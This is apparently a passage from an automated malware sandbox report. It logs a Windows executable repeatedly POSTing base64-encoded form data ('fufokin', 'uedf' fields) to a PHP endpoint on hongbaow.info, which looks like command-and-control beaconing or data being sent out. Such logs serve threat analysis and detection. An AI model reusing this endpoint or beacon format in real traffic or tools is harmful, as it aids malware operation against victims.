                            server-timing: cfL4;desc="?proto=TCP&rtt=1804&min_rtt=1800&rtt_var=683&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1170&delivery_rate=1591280&cwnd=218&unsent_bytes=0&cid=fda79413e49c1ed6&ts=342&x=0"
                            2025-01-22 07:35:32 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            17192.168.2.449754104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:35:34 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:35:34 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:35:34 UTC807INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:35:34 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZgiczgEAXkcaZX0YRUnCEyyHDlYPA%2BRstzwWdruENtYickZzzbLUgze2a8HiFYGypBbo%2FLwqa%2FyXk9nX0vXkcFw5tRUcRYFJU9eQdO26Gz5jwWidU5PrqJhMuMixFHKv"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905dde36cfeb4414-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1570&min_rtt=1567&rtt_var=594&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=952&delivery_rate=1833019&cwnd=180&unsent_bytes=0&cid=00590042a5ce3b5a&ts=338&x=0"
                            2025-01-22 07:35:34 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            18192.168.2.449755104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:35:37 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 313
                            Cache-Control: no-cache
                            2025-01-22 07:35:37 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                            Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                            2025-01-22 07:35:37 UTC812INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:35:37 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8O%2Bgbfuua5uxfDE0Gx5Nz9XM5Lclsvx%2BQjsyTkRZEFRVT14A48JIS9m%2FiYSQEPVEHDe4ZIJgfyd69BfnQiSyvrIQSded%2BcnHFTMddj4P%2FjFi2SStRYzQneBiGwfjSwn9"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905dde4c5c558ca5-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1765&min_rtt=1757&rtt_var=676&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1170&delivery_rate=1597374&cwnd=237&unsent_bytes=0&cid=24d6279f83d81ade&ts=355&x=0"
                            2025-01-22 07:35:37 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            19192.168.2.449756104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:35:37 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:35:37 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:35:38 UTC803INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:35:38 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dj4AYOExCBj54li%2FlLpKRAAc7jgH0lvPgC1V735B4l5tu3nWmHSWAD1jSXePuut6CFZjZn4td6R8ynYJiDDqJWShKywxqQxd4U3kpVHhR9Tu6l2ziQdUL0fMOniF4Z8B"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905dde4ecd4b7c6a-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1786&min_rtt=1783&rtt_var=675&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=952&delivery_rate=1613259&cwnd=218&unsent_bytes=0&cid=3dc36990a3e9f72b&ts=350&x=0"
                            2025-01-22 07:35:38 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            20192.168.2.449757104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:35:41 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:35:41 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:35:42 UTC807INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:35:42 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GokQ8AEdyjgySZqg4iYC3R8ou7W2LIAOUhFZyTXFaM5yx0gQhGdE3JYVUG7Enp%2FeW0DSky6QRq4PQaolgOkMjUlv%2BDRN0RZMCgVW48pWm%2BM2PQo5f3haVP2QTM8y8MuO"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905dde66bd77de95-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1458&min_rtt=1457&rtt_var=550&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=952&delivery_rate=1985044&cwnd=246&unsent_bytes=0&cid=7d4c177148b66195&ts=326&x=0"
                            2025-01-22 07:35:42 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            21192.168.2.449758104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:35:43 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 313
                            Cache-Control: no-cache
                            2025-01-22 07:35:43 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                            Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                            2025-01-22 07:35:43 UTC814INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:35:43 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HyzcLR%2FYh%2B8Grc4oOVkr5%2FQANlFuoNZ8svyXDG%2FnoaJVLCygt3PUgVqdrIVjQx5emxORh%2FxfBCVsVXZLvTYyX4iJoe097rdTkBRpdIyknkBYMazRSJgJ0JX%2BpQcPHxvA"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905dde70f9034414-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1579&min_rtt=1577&rtt_var=596&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1170&delivery_rate=1829573&cwnd=180&unsent_bytes=0&cid=81a84afa306a8293&ts=335&x=0"
                            2025-01-22 07:35:43 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            22192.168.2.449759104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:35:45 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:35:45 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:35:47 UTC824INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:35:46 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dMK8H5MpH4F2N%2F%2Bxr05AWsmT6yPaNw6I%2Fy%2BXoSaNFWtLtfL9nDv0yxOMbl%2F5cJ8jUkf7t4btBS%2FWbINRDN%2Bi8hO%2F%2F9muh2FLjz4Q9e4SV24MofeW%2BOojl%2BzwsS0QLszJ"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905dde7e9ba18ca5-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1786&min_rtt=1781&rtt_var=679&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1600000&cwnd=237&unsent_bytes=0&cid=f4b9b8ab379cd741&ts=1360&x=0"
                            2025-01-22 07:35:47 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            23192.168.2.449760104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:35:49 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 313
                            Cache-Control: no-cache
                            2025-01-22 07:35:49 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                            Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                            2025-01-22 07:35:49 UTC816INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:35:49 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ntrR8gJ7Mg9V1%2BPvzEPfb4XHYj3dwJtMd5AjB%2FVGBMsIT%2BMHzpzmq1sZay6v3U2%2FmoGiXau9Yk%2BIJoDDYwsb9vnltcFre9dDt%2FMdBH30j%2F1CP09ksaSxqHpSpByNscTn"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905dde962e77c358-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1587&min_rtt=1584&rtt_var=600&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1170&delivery_rate=1814791&cwnd=155&unsent_bytes=0&cid=0754527abe5f9fb1&ts=481&x=0"
                            2025-01-22 07:35:49 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            24192.168.2.449761104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:35:50 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:35:50 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:35:50 UTC811INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:35:50 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d%2FhY%2BNF8DPxGJT%2FYJMwRm0GIi1Vmeou%2BuuUV3QJsrlq1pIh3deHgdZXEOaGd9eWmU43odsTju7QvlPrmJuKKm0wdtpvoRtP%2FrfTLWSseXiZAwFzt6ySHf29CXNITlR64"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905dde9d3f3242eb-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1560&min_rtt=1554&rtt_var=596&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1814791&cwnd=215&unsent_bytes=0&cid=967b4a7016564a52&ts=331&x=0"
                            2025-01-22 07:35:50 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            25192.168.2.449762104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:35:54 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:35:54 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:35:54 UTC807INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:35:54 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TzDpoUALw4T42KrYKg5Hvz0jcVtnt4Q1Nmj1v1g%2B8%2FzAOmDJEfQGhQKW0iC1dML%2BmDfipNhAvAwhtQTkD0y0AQ6RUaU1NDlVGNFVFLnbmpoGJImccAEjvJfeOK2qdew0"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddeb33de07c6a-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1813&min_rtt=1813&rtt_var=680&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1608815&cwnd=218&unsent_bytes=0&cid=df136f9d869f20e7&ts=349&x=0"
                            2025-01-22 07:35:54 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            26192.168.2.449764104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:35:55 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 313
                            Cache-Control: no-cache
                            2025-01-22 07:35:55 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                            Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                            2025-01-22 07:35:55 UTC808INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:35:55 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eU7GEplpmsPGCeAemMEHXmasSVIn0WzfGUzzJ234zpfxIS47faK62cRUcRzVmISXw3OG0eg6PgF0x9V0Il%2BOkCp5e0PnZAsyd%2B0J%2FQLVw8YMafmGRmG36ZX0EaSjQoV3"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddebaa969de95-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1507&min_rtt=1499&rtt_var=568&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1170&delivery_rate=1947965&cwnd=246&unsent_bytes=0&cid=e562dc4b97cf0048&ts=345&x=0"
                            2025-01-22 07:35:55 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            27192.168.2.449766104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:35:57 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:35:57 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
